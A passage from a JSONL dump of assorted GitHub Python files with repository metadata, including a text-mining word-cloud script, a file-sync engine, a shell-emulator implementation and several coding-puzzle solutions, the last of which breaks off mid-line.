Turtle()\npangolim.color(\"yellow\")\npangolim.right(90)\npangolim.forward(240)\npangolim.left(90)\npangolim.forward(70)\npangolim.left(90)\npangolim.forward(40)\n","repo_name":"in1076/in1076.github.io","sub_path":"_site/programas/01_caotaruga.py","file_name":"01_caotaruga.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"43730117002","text":"import pandas as pd\nimport string\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PIL import Image\nimport wordcloud\nfrom collections import Counter\nimport os\nimport re\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize, sent_tokenize\nfrom nltk.stem import WordNetLemmatizer, PorterStemmer, SnowballStemmer\n\n\n# Read the data\ndf = pd.read_csv('final.csv')\n\n\nnltk.data.path.append('/home/mahshid/nltk_data/corpora/stopwords')\n\n# Download the stopwords corpus from NLTK\nstop_words = set(stopwords.words('english'))\nnltk.download('punkt')\nnltk.download('wordnet')\n\n# Define a function to preprocess text\ndef preprocess_text(text):\n\n # Convert to lowercase\n text = text.lower()\n\n # Tokenize the text into words\n words = word_tokenize(text)\n\n\n # Remove Unicode Characters\n text = re.sub(r\"(@\\[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)|^rt|http.+?\", \" \", text)\n text = re.sub(r\"(@\\[A-Za-z0-9]|^rt|http.+?)|(git-svn-id)|(://svn.apache.org/repos/asf/jakarta)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\",\" \",text)\n \n # Remove Digit\n new_str = \"\"\n\n for c in text:\n if c.isdigit():\n new_str += \" \"\n else:\n new_str += c\n\n text = new_str\n\n text = \" \".join([word for word in text.split() if len(word) > 2])\n\n\n p = [\n \"fbbffaedef\", \"sandbox\", \"trunk\", \"license\" , \"bcel\" , \"vfs\" , \"apache\" , \"contact\" , \"address\", \"svn\", \"https\", \"www\", \"org\", \"com\",\n \"net\", \"http\", \"id\", \"gitsvnid\", \"tags\", \"branches\", \"jakarta\", \"codec\", \"commons\",\"git\", \"license\",\n \"ffaedef\", \"ffa\", \"edef\", \"and\", \"for\", \"the\"]\n\n text = list(filter(lambda x: x not in p, text.split()))\n \n\n\n # Remove stop wordsze(text)\n words = [word for word in str(text).split() if word not in stop_words]\n \n # Stem the words\n stemmer = SnowballStemmer('english')\n words = [stemmer.stem(word) for word in words]\n\n \n # Lemmatize the words\n lemmatizer = WordNetLemmatizer()\n words = [lemmatizer.lemmatize(word) for word in words]\n\n\n text = \" \".join(text)\n return text\n\n\n# Create a new dataframe for commits with improved readability\ndf_improved = df[df['readability'] > 0].copy()\n# Preprocess the commit messages in the improved readability dataframe\ndf_improved['preprocessed_commit_msg'] = df_improved['commit_msg'].apply(preprocess_text)\n\n# frequency of words\ntext_frequency = df_improved['commit_msg'].apply(preprocess_text).str.split(expand=True).stack()\ntext_frequency = Counter(text_frequency)\nmost_common_words = text_frequency.most_common(5)\nfrequency = pd.DataFrame(most_common_words, columns=['word', 'frequency'])\n\nplt.bar(frequency['word'], frequency['frequency'])\nplt.show()\n\n\n# Create a Wordcloud for improved readability\nimproved_wordcloud = wordcloud.WordCloud(collocations = False, background_color='white').generate(' '.join(df_improved['preprocessed_commit_msg']))\nplt.imshow(improved_wordcloud, interpolation='bilinear')\nplt.axis('off')\nplt.show()\n\n# Create a new dataframe for commits with decreased readability\ndf_decreased = df[df['readability'] < 0].copy()\n# Preprocess the commit messages in the decreased readability dataframe\ndf_decreased['preprocessed_commit_msg'] = df_decreased['commit_msg'].apply(preprocess_text)\n\n# frequency of words\ntext_frequency = df_decreased['commit_msg'].apply(preprocess_text).str.split(expand=True).stack()\ntext_frequency = Counter(text_frequency)\nmost_common_words = text_frequency.most_common(5)\nfrequency = pd.DataFrame(most_common_words, columns=['word', 'frequency'])\n\nplt.bar(frequency['word'], frequency['frequency'])\nplt.show()\n\n\n# Create a Wordcloud for decreased readability\ndecreased_wordcloud = wordcloud.WordCloud(collocations= False, background_color='white').generate(' '.join(df_decreased['preprocessed_commit_msg']))\nplt.imshow(decreased_wordcloud, interpolation='bilinear')\nplt.axis('off')\nplt.show()\n","repo_name":"MoonGirl99/Code-Readability-Analysis-and-Prediction","sub_path":"text mining.py","file_name":"text mining.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40754974126","text":"def remove_duplicate(lst):\r\n j = 0\r\n lst.sort()\r\n for i in range(len(lst) - 1):\r\n if lst[i] != lst[i + 1]:\r\n lst[j] = lst[i]\r\n j += 1\r\n lst[j] = lst[-1]\r\n for _ in range(len(lst) - j - 1):\r\n lst.pop()\r\n\r\nlst1 = [2,2,2,2,2]\r\nremove_duplicate(lst1)\r\nprint(lst1)\r\n\r\nlst2 = [5,2,3,6,4,2,5,4,3,7,8,7,6,7,8,9,4,5,7,2]\r\nremove_duplicate(lst2)\r\nprint(lst2)","repo_name":"ShangZhao2000/algorithms","sub_path":"remove_duplicate.py","file_name":"remove_duplicate.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73315649928","text":"from __future__ import absolute_import, unicode_literals\n\nfrom .nomenclature import AirProperties, RefProperties\nfrom .safeprop import airprop, phase, refprop\n\n__banner__ = r\"\"\"\n ____ ___ ___\n / __/__ _/ _/__ / _ \\_______ ___\n _\\ \\/ _ `/ _/ -_) ___/ __/ _ \\/ _ \\\n/___/\\_,_/_/ \\__/_/ /_/ \\___/ .__/\n /_/ by Andrew Hjortland\n\"\"\"\n\n__title__ = 'safeprop'\n__summary__ = 'Wrappers for CoolProp for safe property calculations.'\n__uri__ = 'https://github.com/ahjortland/safeprop'\n\n__version__ = '0.0.1'\n\n__author__ = 'Andrew Hjortland'\n__email__ = 'andrew.hjortland@gmail.com'\n\n__license__ = 'MIT'\n__copyright__ = 'Copyright 2016 Andrew Hjortland'\n","repo_name":"abahman/safeprop","sub_path":"safeprop/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28666229888","text":"import sys\n\nn = int(sys.stdin.readline())\nwords = [input() for _ in range(n)]\n\n# 중복제거\nwords = list(set(words))\n\nwords.sort(key=lambda x:[len(x), x])\n\nfor word in words:\n print(word)\n\n# https://www.acmicpc.net/problem/1181","repo_name":"Gajeju/Coding_test_Programming","sub_path":"bkackjoon/step/12_sort/P08_1181.py","file_name":"P08_1181.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9436022445","text":"data ={1:'Navin',2:'kiran',4:'Harsh'}\n#print(data[1])\n#print(data.get(3))\n#print(data.get(2,'Not found'))\n#print(data.get(3,'Not found'))\nkeys=['Navin','kiran','Harsh']\nvalues=['JS','Python','Java']\ndatas=dict(zip(keys,values))#zip() in python can be used to join two files\n#print(datas)\n#print(datas['kiran'])\ndatas['Monica']=['CS']\n#print(datas['Monica'])\n#print(datas)\nprogL={'JS':'Atom','CS':'VS','Python':['Pycharm','Spyder'],'Java':{'JavaSE':'Netbeans','JavaEE':'Eclipse'}}\n#print(progL['Python'][1])\n#print(progL['Java']['JavaSE'])\ndata2=data.copy()\ndel data2[2]\n#print(data2)\n#print(data)\ndata2.update({3:'Neha'})#update() function is used to add new items to a dictionary\n#print(data2.items())\n#print(data2.keys())\nprint(data2.values())\n\n\n","repo_name":"Nirvik-Sarkar/Python-tutorial","sub_path":"Dictionary.py","file_name":"Dictionary.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28438997520","text":"\"\"\"\nDetermines commands to be run in order to update the original directory and match\nthe state of the edit directory.\n\"\"\"\nfrom roamer.command import Command\nfrom roamer import record\nfrom roamer.entry import Entry\nfrom roamer.directory import Directory\n\nclass Engine(object):\n def __init__(self, original_dir, edit_dir):\n self.original_dir = original_dir\n self.edit_dir = edit_dir\n self.commands = []\n\n def compile_commands(self):\n self.compare_dirs()\n self.new_entries()\n self.handle_unknown_digests()\n self.save_copy_over_files_to_trash()\n\n def compare_dirs(self):\n for digest, original_entry in self.original_dir.entries.items():\n new_entries = self.edit_dir.find(digest)\n if new_entries is None:\n self.commands.append(Command('roamer-trash-copy', original_entry))\n continue\n found_original = False\n for new_entry in new_entries:\n if new_entry.name == original_entry.name:\n found_original = True\n else:\n self.commands.append(Command('cp', original_entry, new_entry))\n if not found_original:\n self.commands.append(Command('roamer-trash-copy', original_entry))\n\n def new_entries(self):\n add_blank_entries = self.edit_dir.find(None)\n if add_blank_entries:\n for entry in add_blank_entries:\n self.commands.append(Command('touch', entry))\n\n def handle_unknown_digests(self):\n unknown_digests = set(self.edit_dir.entries.keys()) - set(self.original_dir.entries.keys())\n\n for digest in filter(None, unknown_digests):\n entries = load_entries(filter_dir=self.original_dir)\n trash_entries = load_entries(trash=True)\n outside_entry = entries.get(digest) or trash_entries.get(digest)\n if outside_entry is None:\n raise Exception('digest %s not found' % digest)\n\n for entry in self.edit_dir.find(digest):\n new_entry = Entry(entry.name, self.original_dir)\n self.commands.append(Command('cp', outside_entry, new_entry))\n\n def save_copy_over_files_to_trash(self):\n trash_entries = [c.first_entry for c in self.commands if c.cmd == 'roamer-trash-copy']\n copy_over_entires = [c.second_entry.name for c in self.commands if c.cmd == 'cp']\n for entry in trash_entries:\n if entry.name not in copy_over_entires:\n self.commands.append(Command('rm', entry))\n\n def commands_to_str(self):\n string_commands = [str(command) for command in sorted(self.commands)]\n # sort so that cp comes first. Need to copy before removals happen\n return '\\n'.join(string_commands)\n\n def run_commands(self):\n return [command.execute() for command in sorted(self.commands)]\n\n\ndef load_entries(**kwargs):\n dictionary = {}\n for row in record.load(**kwargs):\n entry = Entry(row['name'], Directory(row['path'], []), row['digest'])\n dictionary[row['digest']] = entry\n return dictionary\n","repo_name":"abaldwin88/roamer","sub_path":"roamer/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","stars":608,"dataset":"github-code","pt":"16"} +{"seq_id":"6889189628","text":"import argparse\nimport sys\n\nfrom cryptopyutils import dirs\n\n\ndef main():\n \"\"\"Dirs Manipulation CLI\"\"\"\n parser = argparse.ArgumentParser(description=\"DIRECTORY MANIPULATION\")\n parser.add_argument(\"action\", choices=[\"mkdir\", \"rmdir\"], help=\"Action\")\n parser.add_argument(\"dir\", help=\"Directory\")\n args = parser.parse_args()\n if args.action == \"mkdir\":\n dirs.mkdir(args.dir)\n print(\"Created folder : %s\" % args.dir)\n elif args.action == \"rmdir\":\n # prevent accidental system damage\n if args.dir in [\n \"/\",\n \"/etc\",\n \"/bin\",\n \"/boot\",\n \"/dev\",\n \"/home\",\n \"/init\",\n \"/lib\",\n \"/lib32\",\n \"/lib64\",\n \"/libx32\",\n \"/lost+found\",\n \"/media\",\n \"/mnt\",\n \"/opt\",\n \"/proc\",\n \"/root\",\n \"/run\",\n \"/sbin\",\n \"/snap\",\n \"/srv\",\n \"/sys\",\n \"/tmp\",\n \"/usr\",\n \"/var\",\n \"~\",\n \"$HOME\",\n ]:\n print(\"Cannot remove system or home directories\")\n sys.exit(1)\n # remove\n dirs.rmdir(args.dir)\n print(\"Removed folder : %s\" % args.dir)\n else:\n print(\"Command not supported\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dheurtev/cryptopyutils","sub_path":"src/cryptopyutils/cli/dirs.py","file_name":"dirs.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14131479318","text":"import re\nimport os\nfrom os import listdir\nimport glob\n\nfrom abc import ABC, abstractmethod\nfrom typing import List\n\n\nclass Application(ABC):\n \"\"\"\n Application is an abstract base class for all applications to inherit from\n It takes in arguments and returns the output ready for the output stream\n \"\"\"\n\n @abstractmethod\n def exec(self, args) -> List[str]:\n pass\n\n def raise_error(self, message, type, output) -> None:\n if self.unsafe:\n output.append(message + \"\\n\")\n else:\n if type == \"file_not_found\":\n raise FileNotFoundError(message)\n elif type == \"not_directory\":\n raise NotADirectoryError(message)\n elif type == \"value\":\n raise ValueError(message)\n elif type == \"type\":\n raise TypeError(message)\n else:\n raise RuntimeError(message)\n\n\nclass Pwd(Application):\n \"\"\"\n Pwd implements the 'pwd' shell function\n It outputs the current working directory followed by a newline.\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> str:\n return os.getcwd() + \"\\n\"\n\n\nclass Cd(Application):\n \"\"\"\n Cd implements the 'cd' shell function\n It changes the current working directory.\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n if len(args) == 0 or len(args) > 1:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n if not os.path.exists(args[0]):\n self.raise_error(\n f\"No such directory: {args[0]}\",\n \"not_directory\",\n output\n )\n else:\n os.chdir(args[0])\n\n return output\n\n\nclass Ls(Application):\n \"\"\"\n Ls implements the 'ls' shell function\n Lists the content of a directory.\n It prints list of files and directories\n separated by tabs and followed by a newline.\n Ignores files and directories whose names start with '.' .\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n if len(args) == 0:\n ls_dir = os.getcwd()\n elif len(args) > 1:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n ls_dir = args[0]\n else:\n ls_dir = args[0]\n if not os.path.exists(ls_dir):\n self.raise_error(\n f\"No such directory: {ls_dir}\",\n \"not_directory\",\n output\n )\n else:\n for f in listdir(ls_dir):\n if not f.startswith(\".\"):\n output.append(f + \"\\n\")\n\n return output\n\n\nclass Cat(Application):\n \"\"\"\n Cat implements the 'cat' shell function\n It concatenates the content of given files\n and prints to stdout\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n if len(args) == 0:\n self.raise_error(\"No file specified\", \"type\", output)\n return output\n for a in args:\n if \"#STDIN#\" in a:\n f = a[1:]\n for x in f:\n output.append(x)\n else:\n if not os.path.exists(a):\n self.raise_error(\n f\"No such file or directory: {a}\",\n \"file_not_found\",\n output\n )\n else:\n with open(a) as f:\n output.append(f.read())\n\n if output[-1][-2:] != \"\\n\":\n output.append(\"\\n\")\n return output\n\n\nclass Echo(Application):\n \"\"\"\n Echo implements the 'echo' shell function\n It prints its args seperated by spaces\n and followed by newline to stdout\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> str:\n return \" \".join(args) + \"\\n\"\n\n\nclass Head(Application):\n \"\"\"\n Head implements the 'head' shell function\n Prints the first N lines of a given file or stdin\n If < N lines, it prints only existing lines without raising an exception\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n file = \"\"\n\n if len(args) != 1 and len(args) != 3:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n if len(args) == 1:\n num_lines = 10\n file = args[0]\n if len(args) == 3:\n if args[0] != \"-n\":\n self.raise_error(\"Wrong flags\", \"value\", output)\n return output\n else:\n num_lines = int(args[1])\n file = args[2]\n\n if \"#STDIN#\" in file:\n file = file[1]\n lines = file.split(\"\\n\")\n for i in range(0, min(len(lines), num_lines)):\n output.append(lines[i] + \"\\n\")\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n else:\n with open(file) as f:\n lines = f.readlines()\n for i in range(0, min(len(lines), num_lines)):\n if i == len(lines) - 1:\n output.append(lines[i] + \"\\n\")\n else:\n output.append(lines[i])\n\n return output\n\n\nclass Tail(Application):\n \"\"\"\n Tail implements the 'tail' shell function\n Prints the last N lines of a given file or stdin\n If < N lines, it prints only existing lines\n without raising an exception\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n file = \"\"\n\n if len(args) != 1 and len(args) != 3:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n if len(args) == 1:\n num_lines = 10\n file = args[0]\n if len(args) == 3:\n if args[0] != \"-n\":\n self.raise_error(\"Wrong flags\", \"value\", output)\n return output\n else:\n num_lines = int(args[1])\n file = args[2]\n\n if \"#STDIN#\" in file:\n file = file[1]\n lines = file.split(\"\\n\")\n display_length = min(len(lines), num_lines) + 1\n for i in range(0, display_length):\n output.append(lines[len(lines) - display_length + i] + \"\\n\")\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n else:\n with open(file) as f:\n lines = f.readlines()\n display_length = min(len(lines), num_lines)\n for i in range(0, display_length):\n if i == display_length - 1:\n output.append(\n lines[len(lines) - display_length + i]\n + \"\\n\"\n )\n else:\n output.append(\n lines[len(lines) - display_length + i]\n )\n\n return output\n\n\nclass Grep(Application):\n \"\"\"\n Grep implements the 'grep' shell function\n It searches for lines containing a match to specified pattern\n Output of command is the list of lines found\n Each line is followed by a newline\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n if len(args) < 2:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n\n pattern = args[0]\n files = args[1:]\n for file in files:\n if \"#STDIN#\" in file:\n file = file[1]\n for line in file.split(\"\\n\"):\n if line != \"\":\n if re.match(pattern, line):\n output.append(line + \"\\n\")\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n else:\n with open(file) as f:\n lines = f.readlines()\n for line in lines:\n if re.match(pattern, line):\n if len(files) > 1:\n match_string = (\n file +\n \":\" +\n line.replace(\"\\n\", \"\") + \"\\n\"\n )\n output.append(match_string)\n else:\n output.append(\n line.replace(\"\\n\", \"\")\n + \"\\n\"\n )\n\n return output\n\n\nclass Cut(Application):\n \"\"\"\n Cut implements the 'cut' shell function\n It cuts out sections from each line of a given file or stdin\n Outputs result to stdout\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n if len(args) != 3:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n if args[0] != \"-b\":\n self.raise_error(\"Wrong flags\", \"value\", output)\n return output\n\n bytes = args[1].split(\",\")\n indexs = []\n file = args[2]\n\n if \"#STDIN#\" in file:\n file = file[1]\n lines = file.split(\"\\n\")\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n return output\n else:\n with open(file) as f:\n lines = f.readlines()\n\n for byte in bytes:\n if \"-\" not in byte:\n if (int(byte) - 1) not in indexs:\n indexs.append(int(byte) - 1)\n elif byte[0] == \"-\":\n for i in range(0, int(byte[1:])):\n if i not in indexs:\n indexs.append(i)\n elif byte[-1] == \"-\":\n for i in range(int(byte[:-1]) - 1, len(max(lines, key=len))):\n if i not in indexs:\n indexs.append(i)\n else:\n indexRange = byte.split(\"-\")\n for i in range(int(indexRange[0]) - 1, int(indexRange[1])):\n if i not in indexs:\n indexs.append(i)\n\n indexs.sort()\n\n for line in lines:\n line = line.strip(\"\\n\")\n newLine = \"\"\n for i in indexs:\n if i < len(line):\n newLine = newLine + line[i]\n output.append(newLine + \"\\n\")\n\n return output\n\n\nclass Find(Application):\n \"\"\"\n Find implements the 'find' shell function\n It recursively searches for files with matching names\n Outputs list of relative paths, each followed by newline\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n initPathLength = len(os.getcwd())\n path = args[0]\n\n def recursive_find(path):\n files = os.listdir(path)\n for file in files:\n newPath = os.path.join(path, file)\n if args[0] != \"-name\":\n # outputs absolute path if directory is given at the start\n output.append(newPath + \"\\n\")\n elif args[0] == \"-name\":\n # replace absolute path with relative path if no dir given\n output.append(\".\" + newPath[initPathLength:] + \"\\n\")\n\n if os.path.isdir(newPath):\n recursive_find(newPath)\n\n # If no directory is given, use current working directory\n if args[0] == \"-name\":\n path = os.getcwd()\n if args[0] != \"-name\" and not os.path.exists(args[0]):\n self.raise_error(\n f\"Directory given does not exist: {args[0]}\",\n \"not_directory\",\n output\n )\n return output\n if \"-name\" not in args:\n recursive_find(path)\n if args[len(args) - 1] == \"-name\":\n self.raise_error(\n \"-name requires additional arguments\",\n \"type\",\n output\n )\n return output\n\n # If globbing wildcard is given, this runs instead.\n elif len(args) > 1:\n s = args[len(args) - 1]\n concPath = path + \"/**/\" + s\n files = glob.glob(concPath, recursive=True)\n if args[0] != \"-name\":\n for file in files:\n output.append(file + \"\\n\")\n elif args[0] == \"-name\":\n for file in files:\n output.append(\".\" + file[initPathLength:] + \"\\n\")\n\n return output\n\n\nclass Uniq(Application):\n \"\"\"\n Uniq implements the 'uniq' shell function\n It detects and deletes adjacent duplicate lines from an input file/stdin\n Outputs result to stdout\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n\n if len(args) > 2:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n if len(args) == 1:\n file = args[0]\n case = 0\n if len(args) == 2:\n if args[0] != \"-i\":\n self.raise_error(\"Wrong flags\", \"value\", output)\n return output\n else:\n case = 1\n file = args[1]\n\n if \"#STDIN#\" in file:\n contents = []\n for lines in file[1:]:\n for line in lines.split(\"\\n\"):\n if line != \"\":\n contents.append(line)\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n return output\n else:\n with open(file, \"r\") as f:\n contents = f.read().splitlines()\n\n indexToRemove = []\n\n if case == 0:\n for i in range(0, len(contents) - 1):\n if contents[i] == contents[i + 1]:\n indexToRemove.append(i + 1)\n\n else:\n for i in range(0, len(contents) - 1):\n j = i\n while (\n (j + 1) < len(contents)\n and contents[j].lower() == contents[j + 1].lower()):\n if (j + 1) not in indexToRemove:\n indexToRemove.append(j + 1)\n j += 1\n\n indexToRemove.sort(reverse=True)\n\n for index in indexToRemove:\n contents.pop(index)\n\n for line in contents:\n output.append(line + \"\\n\")\n\n return output\n\n\n# TODO Implement sort from Robins branch\nclass Sort(Application):\n \"\"\"\n Sort implements the 'sort' shell function\n It sorts the contents of a file/stdin line by line\n Outputs results to stdout\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n\n rev = 0 # reverse order true/false\n if len(args) > 2:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n if len(args) == 1:\n file = args[0]\n if len(args) == 2:\n if args[0] != \"-r\":\n self.raise_error(\n \"Wrong flags\",\n \"value\",\n output\n )\n return output\n else:\n rev = 1\n file = args[1]\n\n if \"#STDIN#\" in file:\n contents = []\n for lines in file[1:]:\n for line in lines.split(\"\\n\"):\n if line != \"\":\n contents.append(line)\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n return output\n else:\n with open(file, \"r\") as f:\n contents = f.read().splitlines()\n\n contents.sort()\n if rev == 1:\n contents = contents[::-1]\n\n for line in contents:\n output.append(line + \"\\n\")\n\n return output\n","repo_name":"charliebarber/shell","sub_path":"src/applications/applications.py","file_name":"applications.py","file_ext":"py","file_size_in_byte":18704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5895460681","text":"#!/usr/bin/python3\nimport sys\nimport numpy as np\nfrom scipy.spatial.distance import cdist\n\ncoords = [tuple(int(s.strip()) for s in l.strip().split(','))\n for l in sys.stdin.readlines()]\nxmax = max(x for x, y in coords)\nymax = max(y for x, y in coords)\nshape = (xmax + 1, ymax + 1)\nR = max(*shape)\n\ngrid = np.zeros(shape, dtype=int)\n# this can't be the easiest way to do this...\nindices = np.asarray(list(np.ndindex(grid.shape)))\ndist = cdist(indices, coords, metric='cityblock')\ncost = np.sum(dist, axis=1)\n\nprint(np.count_nonzero(cost < 10000))\n","repo_name":"acarapetis/advent-of-code-2018","sub_path":"problem12.py","file_name":"problem12.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24210589112","text":"from sys import stdin\n\n\ndef exe(x):\n cou = 0\n l = []\n while cou < int(x):\n y = stdin.readline()\n z = stdin.readline()\n total_len = 0\n rope_len = z.split()\n\n i = 0\n for _ in rope_len:\n rope_len[i] = int(rope_len[i])\n i += 1\n\n for q in rope_len:\n total_len += q\n total_len -= 2\n\n l.append(total_len + 2)\n cou += 1\n\n for r in l:\n print(r)\n\nc = stdin.readline()\nexe(c)\n","repo_name":"ppkavinda/HacKerRank","sub_path":"ropes.py","file_name":"ropes.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16059332472","text":"class Solution:\n def threeSumClosest(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: int\n \"\"\"\n nums.sort()\n result = nums[0] + nums[1] + nums[2]\n\n for i in range(len(nums) - 2):\n j, k = i+1, len(nums) - 1\n while j < k:\n tmp_sum = nums[i] + nums[j] + nums[k]\n if tmp_sum == target:\n return tmp_sum\n\n if abs(tmp_sum - target) < abs(result - target):\n result = tmp_sum\n\n if tmp_sum < target:\n j += 1\n elif tmp_sum > target:\n k -= 1\n\n return result\n","repo_name":"alekfed/leetcode-solutions-python","sub_path":"0016.3sum-closest.py","file_name":"0016.3sum-closest.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34137662993","text":"#\n# @lc app=leetcode id=313 lang=python3\n#\n# [313] Super Ugly Number\n#\n# https://leetcode.com/problems/super-ugly-number/description/\n#\n# algorithms\n# Medium (42.59%)\n# Total Accepted: 65.3K\n# Total Submissions: 153.3K\n# Testcase Example: '12\\n[2,7,13,19]'\n#\n# Write a program to find the nth super ugly number.\n# \n# Super ugly numbers are positive numbers whose all prime factors are in the\n# given prime list primes of size k.\n# \n# Example:\n# \n# \n# Input: n = 12, primes = [2,7,13,19]\n# Output: 32 \n# Explanation: [1,2,4,7,8,13,14,16,19,26,28,32] is the sequence of the first\n# 12 \n# ⁠ super ugly numbers given primes = [2,7,13,19] of size 4.\n# \n# Note:\n# \n# \n# 1 is a super ugly number for any given primes.\n# The given numbers in primes are in ascending order.\n# 0 < k ≤ 100, 0 < n ≤ 106, 0 < primes[i] < 1000.\n# The nth super ugly number is guaranteed to fit in a 32-bit signed integer.\n# \n# \n#\n\n\n\nimport bisect\nfrom queue import PriorityQueue\nfrom collections import defaultdict, Counter\nimport heapq\nimport math\nfrom operator import mul\nfrom functools import reduce\nfrom itertools import count\nfrom pprint import pprint\n# from functools import lru_cache\nclass Solution:\n # def nthSuperUglyNumber(self, n: int, primes: List[int]) -> int:\n def nthSuperUglyNumber2(self, n: int, primes) -> int:\n\n l = [1]\n d = defaultdict(lambda: False)\n d[1] = True\n def recur(n):\n if n == 1:\n return 1\n else:\n last = recur(n-1)\n for p in primes:\n num = p*last\n if num > l[-1]:\n l.append(num)\n d[num] = True\n else:\n if not d[num]:\n bisect.insort_left(l, num)\n d[num] = True\n # break\n # print(l)\n return l[n-1]\n return recur(n)\n\n\n\n def nthSuperUglyNumber1(self, n: int, primes) -> int:\n\n pq = []\n d = defaultdict(lambda: False)\n heapq.heappush(pq, 1)\n d[1] = True\n for i in range(0, n):\n num = heapq.nsmallest(i+1, pq)[-1]\n for p in primes:\n r = p*num\n if not d[r]:\n # print(pq)\n heapq.heappush(pq, r)\n d[r] = True\n # print(sorted(pq))\n return heapq.nsmallest(n, pq)[-1]\n\n\n\n def nthSuperUglyNumber(self, n: int, primes) -> int:\n pq = []\n d = defaultdict(lambda: False)\n pq = [1]\n d[1] = True\n for i in range(0, n):\n for p in primes:\n r = p*pq[i]\n if not d[r]:\n if r > pq[-1]:\n pq.append(r)\n else:\n bisect.insort_left(pq, r)\n d[r] = True\n return pq[n-1]\n\n\n\n \n\n # for i in range(1,13):\n # print(next(hq2(i)))\n # print(next(hq2(12)))\n\n\n # return hq2(n)\n\n\n def nthSuperUglyNumber3(self, n: int, primes) -> int:\n base = primes[0]\n m = list(map(lambda x: math.log(x, base), primes))\n # print('m=', m)\n l = list(zip(m, range(len(primes))))\n template = []\n\n # pq = PriorityQueue()\n pq = []\n # heapq.heappush(pq, 1)\n\n\n for v,k in l:\n t = [0]*len(primes)\n t[k]=1\n template.append(t)\n heapq.heappush(pq, (v,t)) \n\n # print(template)\n\n\n\n def get_new_kv(l):\n # print('get_new_kv')\n i = -1\n me = values[i]\n k = ks[i]\n # print(values, me)\n # print(ks)\n temp = []\n while me + values[i-1]>me:\n temp.append((me + values[i-1],[a+b for a,b in zip(k, ks[i-1])]))\n i -= 